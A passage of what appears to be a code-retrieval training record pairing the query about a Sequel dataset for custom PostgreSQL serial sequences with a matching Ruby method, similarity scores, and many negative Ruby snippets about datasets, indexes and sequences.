"def get_fields\n DatasetService.get_fields self.dataset_id, self.api_table_name\n end",
"def represent_dataset(dataset, mode, opts: nil, context: nil)\n dataset = modify_with(dataset, mode) if @modes[mode][:modifier]\n repr_proc = representer_proc(dataset.model, mode)\n rds = RepresentableDataset.new(dataset)\n\n # Paginate the dataset if pagination was passed.\n paginate(rds, opts) if opts\n\n # Map the dataset items into represented objects.\n rds.map! do |item|\n represented_object = RepresentedObject.new\n repr_proc.call(item, represented_object, context)\n end\n\n rds\n end",
"def associated_dataset\n cached_fetch(:_dataset){apply_dataset_changes(_associated_dataset)}\n end",
"def versions_dataset\n if versionable?\n internal_versions_dataset\n else\n self.class.where(:version_id => self.version_id).order(:version_number).reverse\n end\n end",
"def reference_datasets\n if @results.nil?\n @ref_datasets = @project.ref_datasets\n else\n @ref_datasets = @results\n end\n cur_page = (params[:page] || 1).to_i\n per_page = (params[:per_page] || 10).to_i\n @datasets = WillPaginate::Collection.create(\n cur_page, per_page, @ref_datasets.size) do |pager|\n start = (cur_page - 1) * per_page\n pager.replace(@ref_datasets[start, per_page])\n end\n end",
"def all\n @data_adapter.relations\n end",
"def initialize(_layout, _data=[], _queries=[])\n @layout = _layout\n @queries = _queries\n #puts \"DATASET NEW queries:#{@queries}\"\n super(_data)\n end",
"def set_data_list\n @data_list = DataList.find(params[:id])\n end",
"def load_data\n # @categories = Category.find(:all)\n # @infoitems = Expert.find(:all)\n end",
"def build\n attributes = { contains: build_file_sets }\n attributes[:hasMemberOrders] = [{ viewingDirection: reading_order }] if reading_order\n\n cocina_dro.structural.new(attributes)\n end"
] |
[
"0.6950944",
"0.61976147",
"0.6181576",
"0.57991093",
"0.5773287",
"0.56557083",
"0.5640482",
"0.5637681",
"0.5618548",
"0.5608803",
"0.56053627",
"0.55660987",
"0.5563028",
"0.55293816",
"0.5527643",
"0.55013406",
"0.5487018",
"0.5480283",
"0.5435237",
"0.5426875",
"0.54139185",
"0.54100746",
"0.5403118",
"0.5389728",
"0.5389728",
"0.5379883",
"0.53766817",
"0.53714913",
"0.53533304",
"0.53247404",
"0.52974594",
"0.5291655",
"0.5274306",
"0.5203773",
"0.51853067",
"0.51801485",
"0.5170918",
"0.5164159",
"0.5114678",
"0.51080334",
"0.5100059",
"0.50896734",
"0.508665",
"0.508665",
"0.508665",
"0.5077749",
"0.5076436",
"0.5068024",
"0.5066168",
"0.5043178",
"0.5036867",
"0.50356925",
"0.5034834",
"0.50332797",
"0.5030922",
"0.50276136",
"0.5012542",
"0.5008709",
"0.49940237",
"0.49540278",
"0.4947982",
"0.49472323",
"0.4938692",
"0.493819",
"0.4935486",
"0.4929171",
"0.49270883",
"0.49201107",
"0.4914722",
"0.4911662",
"0.49049157",
"0.49020216",
"0.49013793",
"0.4898689",
"0.48872682",
"0.48820946",
"0.48766163",
"0.48671493",
"0.4865747",
"0.48648155",
"0.48601425",
"0.485968",
"0.48524714",
"0.48499334",
"0.48499334",
"0.4835667",
"0.48350686",
"0.48215988",
"0.48180273",
"0.48108953",
"0.48106116",
"0.48073158",
"0.48043525",
"0.48030728",
"0.48028263",
"0.4793798",
"0.4793004",
"0.4784258",
"0.47821382",
"0.4778656"
] |
0.68358237
|
1
|
Dataset used to retrieve index information
|
def _indexes_ds
@_indexes_ds ||= begin
if server_version >= 90500
order = [Sequel[:indc][:relname], Sequel.function(:array_position, Sequel[:ind][:indkey], Sequel[:att][:attnum])]
# :nocov:
else
range = 0...32
order = [Sequel[:indc][:relname], SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(Sequel[:ind][:indkey], [x]), x]}, 32, Sequel[:att][:attnum])]
# :nocov:
end
attnums = SQL::Function.new(:ANY, Sequel[:ind][:indkey])
ds = metadata_dataset.
from{pg_class.as(:tab)}.
join(Sequel[:pg_index].as(:ind), :indrelid=>:oid).
join(Sequel[:pg_class].as(:indc), :oid=>:indexrelid).
join(Sequel[:pg_attribute].as(:att), :attrelid=>Sequel[:tab][:oid], :attnum=>attnums).
left_join(Sequel[:pg_constraint].as(:con), :conname=>Sequel[:indc][:relname]).
where{{
indc[:relkind]=>%w'i I',
ind[:indisprimary]=>false,
:indexprs=>nil,
:indisvalid=>true}}.
order(*order).
select{[indc[:relname].as(:name), ind[:indisunique].as(:unique), att[:attname].as(:column), con[:condeferrable].as(:deferrable)]}
# :nocov:
ds = ds.where(:indisready=>true) if server_version >= 80300
ds = ds.where(:indislive=>true) if server_version >= 90300
# :nocov:
ds
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def index\n @dataset_data = DatasetDatum.all\n end",
"def indices\n @data.keys\n end",
"def construct_index\n end",
"def dataset(index)\n idx_name = IndexName[index]\n Dataset.new(client, params: { index: idx_name.to_sym })\n end",
"def indexed\n self['indexed']\n end",
"def index_information\n @db.index_information(@name)\n end",
"def index\n @datasets = Dataset.all\n end",
"def index\n @datasets = Dataset.all\n end",
"def index\n @datasets = Dataset.all\n end",
"def index_item(name, datapoints, values, fingerprint, trend)\n @client.index({:datapoints => datapoints, :fingerprint => fingerprint, :values => values, :trend => trend, :id => name})\n end",
"def indexed\n meta(index: true)\n end",
"def get_index_values\n hash = {}\n @db.connect\n @index_fields.each do |field|\n tname = table_name field\n sql = \"SELECT id,value FROM #{tname}\"\n res = @db.query(sql)\n res.each_hash do |row|\n hash[row['value']] = row['id']\n end\n end\n @db.close \n hash\n end",
"def index_information\n @db.index_information(@name)\n end",
"def index_information\n collection.index_information\n end",
"def index_information\n collection.index_information\n end",
"def index_information\n collection.index_information\n end",
"def index\n @datat_table_data = DatatTableDatum.all\n end",
"def index\n @train_data = TrainDatum.all\n end",
"def index\n\n @data = Datum.all\n end",
"def index\n @qdatasets = Qdataset.all\n end",
"def ta_index\n end",
"def values\n raise NotImplementedError, \"#{__method__} has not been implemented for this #{name} index\"\n end",
"def index\n @data_set_types = DataSetType.all\n end",
"def index\n @sample_metadata_numericals = SampleMetadataNumerical.all\n end",
"def dataset\n @@dataset\n end",
"def index\n set_index\n end",
"def dataset\n self\n end",
"def dataset\n self\n end",
"def dataset\n self\n end",
"def dataset\n database[table_name]\n end",
"def get_index_info(klass)\n index_info = []\n indexes = klass.connection.indexes(klass.table_name)\n indexes.each do |index|\n index_info << { :name => index.name, :columns => index.columns.join(\", \"), :unique => (index.unique ? \"UNIQUE\" : \"NO\") }\n end\n index_info\n end",
"def dataset_key\n :id\n end",
"def get_indexed_attributes\n {\n data_version: data_version || self.class.current_data_version_number\n }.merge(self.get_crud_attributes)\n end",
"def index; @index; end",
"def data\n @data ||= MultiJson.load(File.read(index_path))\n end",
"def index\r\n build_index unless @index\r\n @index\r\n end",
"def process_dataset_results( results )\n # Extract all of the needed index mapping data from \"attribute_map\"\n map_data = process_attribute_map( @current[:dataset_conf] )\n \n # Now loop through the result data...\n results[:data].each do |data_row|\n # First, create a hash out of the data_row and get the primary_attr_value\n data_row_obj = convert_array_to_hash( results[:headers], data_row )\n primary_attr_value = data_row_obj[ map_data[:primary_attribute] ]\n \n # First check we have something to map back to the index with - if not, move along...\n if primary_attr_value\n # Find us a doc object to map to...\n value_to_look_up_doc_on = extract_value_to_index( map_data[:primary_attribute], primary_attr_value, map_data[:attribute_map], data_row_obj )\n doc = find_document( map_data[:map_to_index_field], value_to_look_up_doc_on )\n \n # If we can't find one - see if we're allowed to create one\n unless doc\n if @current[:dataset_conf][\"indexing\"][\"allow_document_creation\"]\n set_document( value_to_look_up_doc_on, new_document() )\n doc = get_document( value_to_look_up_doc_on )\n end\n end\n \n # Okay, if we have a doc - process the biomart attributes\n if doc\n # Now do the processing\n data_row_obj.each do |attr_name,attr_value|\n # Extract and index our initial data return\n value_to_index = extract_value_to_index( attr_name, attr_value, map_data[:attribute_map], data_row_obj )\n \n if value_to_index and doc[ map_data[:attribute_map][attr_name][\"idx\"] ]\n if value_to_index.is_a?(Array)\n value_to_index.each do |value|\n doc[ map_data[:attribute_map][attr_name][\"idx\"] ].push( value )\n end\n else\n doc[ map_data[:attribute_map][attr_name][\"idx\"] ].push( value_to_index )\n end\n end\n \n # Any further metadata to be extracted from here?\n if value_to_index and map_data[:attribute_map][attr_name][\"extract\"]\n index_extracted_attributes( map_data[:attribute_map][attr_name][\"extract\"], doc, value_to_index )\n end\n end\n \n # Do we have any attributes that we need to group together?\n if @current[:dataset_conf][\"indexing\"][\"grouped_attributes\"]\n index_grouped_attributes( @current[:dataset_conf][\"indexing\"][\"grouped_attributes\"], doc, data_row_obj, map_data )\n end\n \n # Any ontology terms to index?\n if @current[:dataset_conf][\"indexing\"][\"ontology_terms\"]\n index_ontology_terms( @current[:dataset_conf][\"indexing\"][\"ontology_terms\"], doc, data_row_obj, map_data )\n end\n \n # Finally - save the document to the cache\n doc_primary_key = doc[@config[\"schema\"][\"unique_key\"].to_sym][0]\n set_document( doc_primary_key, doc )\n end\n end\n end\n end",
"def index\n @index ||= tree.all_data.index(entry)\n end",
"def index\n retrieve_data_for_graph\n end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def index\n @column_samples = ColumnSample.all\n end",
"def [](index)\n load_data\n super\n end",
"def index ; @index ; end",
"def as_indexed_json\n indexed_values\n end",
"def index\n @data_items = DataItem.all\n end",
"def build_indexes\n Patient.column_names.select { |col| col != 'id' }.each do |col|\n @indexes[ col.to_sym ] = []\n end\n\n Patient.find( :all ).each do |patient|\n Patient.column_names.select { |col| col != 'id' }.each do |col|\n @indexes[ col.to_sym ] << [ patient.send( col ).to_s.strip.hash, patient.id ] unless\n ( (! EXCLUSIONS[ col ].nil?) and EXCLUSIONS[ col ].include? patient.send( col ).to_s.strip )\n end\n end\n\n @indexes.each_value { |value| value.sort! { |a,b| a[0] <=> b[0] } }\n end",
"def index\n load_data\n end",
"def indices\n state(metrics: \"metadata\").dig(\"metadata\", \"indices\")\n end",
"def indexes\n raise 'not implemented'\n end",
"def index\n @input_data = InputDatum.all\n end",
"def dataset_index_conf\n dataset_conf = []\n @config[\"datasets_to_index\"].each do |ds_name|\n ds_conf = JSON.load( File.new(\"#{File.dirname(__FILE__)}/../config/datasets/#{ds_name}/config.json\",\"r\") )\n if ds_conf[\"index\"] and !ds_conf[\"indexing\"].nil?\n ds_conf[\"internal_name\"] = ds_name\n dataset_conf.push( ds_conf )\n end\n end\n return dataset_conf\n end",
"def metadata\n DatasetService.get_metadata dataset_id\n end",
"def indices\n { persona: persona_index,\n numerus: [0, 3],\n genus: [0],\n modus: [0, 6],\n tempus: [nil, nil, nil, 0, 12, 24],\n }\n end",
"def indexes\n @indexes ||= []\n end",
"def construct_index\n @logger.fine('Constructing index...')\n File.open(@index_path, 'wb') do |f|\n write_int(@data_timestamp, f) # The timestamp value - used to determine if an index is valid.\n write_int(0, f) # The first row - always at offset 0.\n @data.each_line { write_int(@data.pos, f) } # The rest of the rows.\n end\n end",
"def index\n database.index\n end",
"def index\n @request_data = RequestDatum.all\n end",
"def index\n unless @descriptor_index\n @descriptor_index = all.inject({}) do |hash,d|\n hash[d.index_key] = d\n hash\n end\n end\n @descriptor_index\n end",
"def index\n @ga_data = GaDatum.all\n end",
"def index\n @index ||= self.class.index\n end",
"def index_data(*models)\n if models.nil? || models.empty?\n only_index = @indexed_models\n else\n only_index = models.collect{|m| m.to_s}\n end \n \n Mebla.log(\"Indexing #{only_index.join(\", \")}\", :debug)\n \n # Build up a bulk query to save processing and time\n bulk_query = \"\"\n # Keep track of indexed documents\n indexed_count = {}\n \n # Create the index\n if create_index\n # Start collecting documents\n only_index.each do |model|\n Mebla.log(\"Indexing: #{model}\")\n # Get the class\n to_index = model.camelize.constantize\n \n # Get the records \n entries = []\n unless to_index.embedded?\n if to_index.sub_class?\n entries = to_index.any_in(:_type => [to_index.name])\n else \n entries = to_index.any_in(:_type => [nil, to_index.name])\n end\n else\n parent = to_index.embedded_parent\n access_method = to_index.embedded_as\n \n parent.all.each do |parent_record|\n if to_index.sub_class?\n entries += parent_record.send(access_method.to_sym).any_in(:_type => [to_index.name])\n else\n entries += parent_record.send(access_method.to_sym).any_in(:_type => [nil, to_index.name])\n end\n end\n end\n \n # Save the number of entries to be indexed\n indexed_count[model] = entries.count \n \n # Build the queries for this model \n entries.each do |document|\n attrs = {} #document.attributes.dup # make sure we dont modify the document it self\n attrs[:id] = document.attributes[\"_id\"] # the id is already added in the meta data of the action part of the query\n \n # only index search fields and methods\n document.class.search_fields.each do |field|\n if document.attributes.keys.include?(field.to_s)\n attrs[field] = document.attributes[field.to_s] # attribute\n else\n attrs[field] = document.send(field) # method\n end\n end\n \n # index relational fields\n document.class.search_relations.each do |relation, fields| \n items = document.send(relation.to_sym) # get the relation document\n \n next if items.nil?\n \n # N relation side\n if items.is_a?(Array) || items.is_a?(Mongoid::Relations::Targets::Enumerable)\n next if items.empty?\n attrs[relation] = []\n items.each do |item|\n if fields.is_a?(Array) # given multiple fields to index\n fields_values = {}\n fields.each do |field|\n if item.attributes.keys.include?(field.to_s)\n fields_values.merge!({ field => item.attributes[field.to_s] }) # attribute\n else\n fields_values.merge!({ field => item.send(field) }) # method\n end\n end\n attrs[relation] << fields_values\n else # only index one field in the relation\n if item.attributes.keys.include?(fields.to_s)\n attrs[relation] << { fields => item.attributes[fields.to_s] } # attribute\n else\n attrs[relation] << { fields => item.send(fields) } # method\n end\n end\n end\n # 1 relation side\n else\n attrs[relation] = {}\n if fields.is_a?(Array) # given multiple fields to index\n fields_values = {}\n fields.each do |field|\n if items.attributes.keys.include?(field.to_s)\n fields_values.merge!({ field => items.attributes[field.to_s] }) # attribute\n else\n fields_values.merge!({ field => items.send(field) }) # method\n end\n end\n attrs[relation].merge!(fields_values)\n else # only index one field in the relation\n if items.attributes.keys.include?(fields.to_s)\n attrs[relation].merge!({ fields => items.attributes[fields.to_s] }) # attribute\n else\n attrs[relation].merge!({ fields => items.send(fields) }) # method\n end\n end\n end\n end \n \n # If embedded get the parent id\n if document.embedded?\n parent_id = document.send(document.class.embedded_parent_foreign_key.to_sym).id.to_s \n 
attrs[(document.class.embedded_parent_foreign_key + \"_id\").to_sym] = parent_id\n attrs[:_parent] = parent_id\n \n # Build add to the bulk query\n bulk_query << build_bulk_query(@slingshot_index_name, to_index.slingshot_type_name, document.id.to_s, attrs, parent_id)\n else\n # Build add to the bulk query\n bulk_query << build_bulk_query(@slingshot_index_name, to_index.slingshot_type_name, document.id.to_s, attrs)\n end\n end\n end\n else\n raise Mebla::Errors::MeblaIndexException.new(\"Could not create #{@slingshot_index_name}!!!\")\n end \n \n Mebla.log(\"Bulk indexing:\\n#{bulk_query}\", :debug) \n \n # Send the query\n response = Slingshot::Configuration.client.post \"#{Mebla::Configuration.instance.url}/_bulk\", bulk_query\n \n # Only refresh the index if no error ocurred\n unless response =~ /error/ \n # Log results\n Mebla.log(\"Indexed #{only_index.count} model(s) to #{self.slingshot_index_name}: #{response}\")\n Mebla.log(\"Indexing Report:\")\n indexed_count.each do |model_name, count|\n Mebla.log(\"Indexed #{model_name}: #{count} document(s)\")\n end\n \n # Refresh the index\n refresh_index\n else\n raise Mebla::Errors::MeblaIndexException.new(\"Indexing #{only_index.join(\", \")} failed with the following response:\\n #{response}\")\n end\n rescue RestClient::Exception => error\n raise Mebla::Errors::MeblaIndexException.new(\"Indexing #{only_index.join(\", \")} failed with the following error: #{error.message}\")\n end",
"def initial_data\n @query_tracker.results.map.with_index do |data, index|\n data = data.dup\n data['_id'] = data['_id'].to_s\n [index, data]\n end\n end",
"def indices\n rest.get instrument_path('indices')\n end",
"def data\n datacolumns.reduce({}) do |t, col|\n t[col.name] = col.data; t\n end\n end",
"def index_id\n @raw[\"indexId\"]\n end",
"def index_signature; end",
"def index_params\n { index: name.dataset.to_sym,\n body: {\n settings: self.class.index_settings,\n mappings: { properties: schema.to_properties } } }\n end",
"def index\n @title=\"Rothstein lab raw colony size data\"\n @header=\"<h1>#{@title}</h1><em>Log Files!</em>\"\n @experiment_raw_datasets = ExperimentRawDataset.all\n end",
"def get_indices(group_name)\n return {} if new_record?\n res = {}\n Property::Db.fetch_attributes(%w{key value}, index_table_name(group_name), index_reader_sql(group_name)).each do |row|\n res[row['key']] = row['value']\n end\n res\n end",
"def open_index(o={})\n @clf = cache_data('clf', Searcher.load_features())\n @con_weights = cache_data('con_weights', Searcher.load_weights(CON_FEATURES, 'con', Conf.weight_con))\n @doc_weights = cache_data('doc_weights', Searcher.load_weights(DOC_FEATURES, 'doc', Conf.weight_doc))\n end",
"def index\n @tbdata = Tbdatum.all\n end",
"def index(data)\n indexH = Hash.new { |hash, key| hash[key] = [] }\n data.each_pair do |filename, tags|\n tags.each do |tag|\n if tag.is_a? Symbol\n indexH[tag] << filename\n elsif tag.is_a? Hash\n tag.each_pair do |sub_key, sub_value|\n #key = tag.keys.first\n #value = tag[key]\n value = sub_key\n indexH[sub_key] << sub_value #in case of project and sample it store (samples|projects) [(samples|projects)_name]\n indexH[sub_value]<< filename #stores for each (sample|project) name its filename so i can search directly for its name\n end\n end\n end #tags\n end #data\n indexH.each_pair do |key, value|\n indexH[key].uniq!\n end\n end",
"def dataset\n @dataset ||= data_maker.dataset\n end",
"def index\n @test_meta_data = TestMetaDatum.all\n end",
"def indexes\n @model.indexes.select{|index| index.columns.include? self.name}\n end",
"def results\n @dataset.all\n end",
"def indexed_attributes\n self.class.columns.select { |c| %i(text string).include?(c.type) }\n .collect(&:name)\n .reject { |c| c =~ /_url$/ } - non_indexed_attributes\n end",
"def index\n table.columns.index self\n end",
"def index\n @attdata = Attdatum.all\n end",
"def tableau index_tableau\n tableaux_in(resultat_final)[index_tableau]\n end",
"def setting_index\n end",
"def index\n @datasets = Dataset.published\n \n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @datasets }\n end\n end",
"def _metadata_dataset\n super.\n with_identifier_input_method(identifier_input_method_default).\n with_identifier_output_method(identifier_output_method_default)\n end",
"def index\n @dataunits = Dataunit.all\n end",
"def [](index); @data[index]; end",
"def index\n @sub_data_tables = SubDataTable.all\n end",
"def index_fields\n\t\t\tif defined? @_index_fields\n\t\t\t\t@_index_fields\n\t\t\telse\n\t\t\t\t#column_names = self.column_names.map do |m|\n\t\t\t\t\t#m.to_sym\n\t\t\t\t#end\n\t\t\t\tsorted_attributes\n\t\t\t# \tsorted_attrs + (column_names - sorted_attrs - [\"created_at\", \"updated_at\", \"id\"])\n\t\t\tend\n\t\tend",
"def index\n set_instruments_grid\n end",
"def metadata_adapter\n Valkyrie::MetadataAdapter.find(:indexing_persister)\n end",
"def metadata_adapter\n Valkyrie::MetadataAdapter.find(:indexing_persister)\n end",
"def metadata\n { \"name\" => name,\n \"description\" => description,\n \"license\" => license,\n \"source\" => datasource.title,\n \"url\" => datasource.url,\n \"publish_date\" => published_at,\n \"default\" => default_dim,\n \"units\" => {}, \n \"indvars\" => datacolumns.independent.map(&:name),\n \"depvars\" => datacolumns.dependent.map(&:name)\n }\n end",
"def index_keys\n index_specifications.map(&:key)\n end",
"def show\n set_index_options\n end",
"def index\n my_tenant_id = (current_user.role == 'admin' ? current_user.tenant_id : nil)\n @all_stats = Stats.new\n @seven_day_stats = Stats.new(tenant_id: my_tenant_id, since: (Time.new - 7.days))\n\n @ds_identifiers = build_table_query\n end",
"def store_index #:nodoc:\n return if @compatibility == 0\n\n indices = @db_indices\n reserved = 0x00000000\n row_min = @dim_rowmin\n row_max = @dim_rowmax\n\n record = 0x020B # Record identifier\n length = 16 + 4 * indices.size # Bytes to follow\n\n header = [record, length].pack('vv')\n data = [reserved, row_min, row_max, reserved].pack('VVVV')\n\n indices.each do |index|\n data = data + [index + @offset + 20 + length + 4].pack('V')\n end\n\n prepend(header, data)\n end",
"def index\n @unstructured_data = UnstructuredDatum.includes(:subcriterium).all\n end",
"def index\n @datasets = Dataset.select_without_data.order(:name).page(params[:page])\n end",
"def index\n @project_datum_columns = ProjectDatumColumn.all\n end",
"def index\n @specdata = Specdatum.all\n end",
"def dataset_method\n :\"#{self[:name]}_dataset\"\n end"
] |
[
"0.71727204",
"0.69043535",
"0.66589785",
"0.6559253",
"0.6507489",
"0.6449275",
"0.6387849",
"0.6387849",
"0.6387849",
"0.63644105",
"0.63298535",
"0.63144547",
"0.6288391",
"0.6281459",
"0.6281459",
"0.6281459",
"0.62788105",
"0.62172794",
"0.62114143",
"0.6202234",
"0.61961377",
"0.60516787",
"0.60452145",
"0.6041444",
"0.60284466",
"0.6001589",
"0.59966236",
"0.59966236",
"0.59966236",
"0.5994592",
"0.59917146",
"0.59666157",
"0.5955333",
"0.5940853",
"0.5936902",
"0.5935593",
"0.5932327",
"0.5932007",
"0.59201574",
"0.5919278",
"0.5906841",
"0.5879718",
"0.5872798",
"0.5871346",
"0.58657366",
"0.58493286",
"0.58464754",
"0.58374166",
"0.5821109",
"0.58204913",
"0.5819026",
"0.58178353",
"0.58115834",
"0.5808004",
"0.5806543",
"0.57962114",
"0.5793748",
"0.57904583",
"0.5777619",
"0.5773533",
"0.57698315",
"0.57666945",
"0.57398164",
"0.57370484",
"0.572276",
"0.5711605",
"0.5710589",
"0.5710453",
"0.5707823",
"0.5706268",
"0.57038176",
"0.569949",
"0.56901217",
"0.56895614",
"0.5680114",
"0.5674988",
"0.56741965",
"0.5673481",
"0.566609",
"0.566317",
"0.56571317",
"0.56395787",
"0.56355685",
"0.5635461",
"0.5626052",
"0.5619468",
"0.5617353",
"0.560983",
"0.5596405",
"0.5596405",
"0.55954534",
"0.558975",
"0.55847347",
"0.5583453",
"0.5583432",
"0.55812025",
"0.5579173",
"0.5568659",
"0.5565827",
"0.5563134"
] |
0.70689636
|
1
|
Dataset used to determine custom serial sequences for tables
|
def _select_custom_sequence_ds
@_select_custom_sequence_ds ||= metadata_dataset.
from{pg_class.as(:t)}.
join(:pg_namespace, {:oid => :relnamespace}, :table_alias=>:name).
join(:pg_attribute, {:attrelid => Sequel[:t][:oid]}, :table_alias=>:attr).
join(:pg_attrdef, {:adrelid => :attrelid, :adnum => :attnum}, :table_alias=>:def).
join(:pg_constraint, {:conrelid => :adrelid, Sequel[:cons][:conkey].sql_subscript(1) => :adnum}, :table_alias=>:cons).
where{{cons[:contype] => 'p', pg_get_expr(self.def[:adbin], attr[:attrelid]) => /nextval/i}}.
select{
expr = split_part(pg_get_expr(self.def[:adbin], attr[:attrelid]), "'", 2)
[
name[:nspname].as(:schema),
Sequel.case({{expr => /./} => substr(expr, strpos(expr, '.')+1)}, expr).as(:sequence)
]
}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _select_serial_sequence_ds\n @_serial_sequence_ds ||= metadata_dataset.\n from{[\n pg_class.as(:seq),\n pg_attribute.as(:attr),\n pg_depend.as(:dep),\n pg_namespace.as(:name),\n pg_constraint.as(:cons),\n pg_class.as(:t)\n ]}.\n where{[\n [seq[:oid], dep[:objid]],\n [seq[:relnamespace], name[:oid]],\n [seq[:relkind], 'S'],\n [attr[:attrelid], dep[:refobjid]],\n [attr[:attnum], dep[:refobjsubid]],\n [attr[:attrelid], cons[:conrelid]],\n [attr[:attnum], cons[:conkey].sql_subscript(1)],\n [attr[:attrelid], t[:oid]],\n [cons[:contype], 'p']\n ]}.\n select{[\n name[:nspname].as(:schema),\n seq[:relname].as(:sequence)\n ]}\n end",
"def sequence_number; end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def uses_sequence\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def sequence_values(rep_prefix, table_name)\n # check if the table has an auto_increment column, return if not\n sequence_row = select_one(<<-end_sql)\n show columns from `#{table_name}` where extra = 'auto_increment'\n end_sql\n return {} unless sequence_row\n column_name = sequence_row['Field']\n\n # check if the sequences table exists, create if necessary\n sequence_table_name = \"#{rep_prefix}_sequences\"\n unless tables.include?(sequence_table_name)\n create_table \"#{sequence_table_name}\".to_sym,\n :id => false, :options => 'ENGINE=MyISAM' do |t|\n t.column :name, :string\n t.column :current_value, :integer\n t.column :increment, :integer\n t.column :offset, :integer\n end\n ActiveRecord::Base.connection.execute(<<-end_sql) rescue nil\n ALTER TABLE \"#{sequence_table_name}\"\n ADD CONSTRAINT #{sequence_table_name}_pkey\n PRIMARY KEY (name)\n end_sql\n end\n\n sequence_row = select_one(\"select current_value, increment, offset from #{sequence_table_name} where name = '#{table_name}'\")\n if sequence_row == nil\n current_max = select_one(<<-end_sql)['current_max'].to_i\n select max(`#{column_name}`) as current_max from `#{table_name}`\n end_sql\n return {column_name => {\n :increment => 1,\n :value => current_max\n }\n }\n else\n return {column_name => {\n :increment => sequence_row['increment'].to_i,\n :value => sequence_row['offset'].to_i\n }\n }\n end\n end",
"def sequence\n @sequence\n end",
"def set_sequence\n if seq!= nil\n sequence=\"\"\n seq.each_with_index do |s,index|\n sequence = sequence + s +\",\"\n end\n if examquestion_ids.count > seq.count\n diff_count = examquestion_ids.count - seq.count\n 0.upto(diff_count-1) do |c|\n sequence = sequence + \"Select\"+\",\"\n end\n end \n self.sequ = sequence \n end\n end",
"def set_sequence\n if seq!= nil\n sequence=\"\"\n seq.each_with_index do |s,index|\n sequence = sequence + s +\",\"\n end\n if examquestion_ids.count > seq.count\n diff_count = examquestion_ids.count - seq.count\n 0.upto(diff_count-1) do |c|\n sequence = sequence + \"Select\"+\",\"\n end\n end \n self.sequ = sequence \n end\n end",
"def titulares_serial\n Representante.find(self.titular_ids_serial).map(&:nombre)\n end",
"def pk_and_sequence_for(table) #:nodoc:\n result = query(<<-end_sql, 'PK and serial sequence')[0]\n SELECT columns.column_name, columns.column_default \n FROM primary_keys \n LEFT JOIN columns \n USING(table_name, column_name)\n WHERE primary_keys.table_name = '#{table_name.gsub(/(^\"|\"$)/,'')}'\n end_sql\n \n if result.length == 0\n return nil\n elsif result[0][1].nil?\n return nil\n else\n default_value = result[0][1]\n seq_name = default_value.match(/\\(\\'(\\w+)\\'\\)/).to_a.last\n return [result[0][0], seq_name]\n end\n rescue\n nil\n end",
"def qseq; @mrna.seq; end",
